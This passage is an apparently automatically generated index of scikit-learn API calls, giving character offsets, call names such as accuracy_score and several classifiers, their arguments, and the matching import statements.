'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14208, 14222), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14354, 14382), 
'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14368, 14382), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14512, 14540), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14526, 14540), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14678, 14706), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (14692, 14706), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((14913, 14933), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (14931, 14933), False, 'from sklearn.linear_model import LogisticRegression\n'), ((14934, 14945), 'sklearn.svm.LinearSVC', 'LinearSVC', ([], {}), '()\n', (14943, 14945), False, 'from sklearn.svm import LinearSVC\n'), ((14946, 14963), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (14949, 14963), False, 'from sklearn.svm import SVC\n'), ((14964, 14986), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (14984, 14986), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((14987, 15011), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {}), '()\n', (15009, 15011), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((15012, 15036), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (15034, 15036), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((15037, 15065), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ([], {}), '()\n', (15063, 15065), False, 'from sklearn.ensemble import GradientBoostingClassifier\n'), ((15066, 15078), 
'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ([], {}), '()\n', (15076, 15078), False, 'from sklearn.naive_bayes import GaussianNB\n'), ((15380, 15408), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['pred', 'y_test'], {}), '(pred, y_test)\n', (15394, 15408), False, 'from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, roc_curve, roc_auc_score\n'), ((15881, 15886), 'sklearn.svm.SVC', 'SVC', ([], {}), '()\n', (15884, 15886), False, 'from sklearn.svm import SVC\n')] |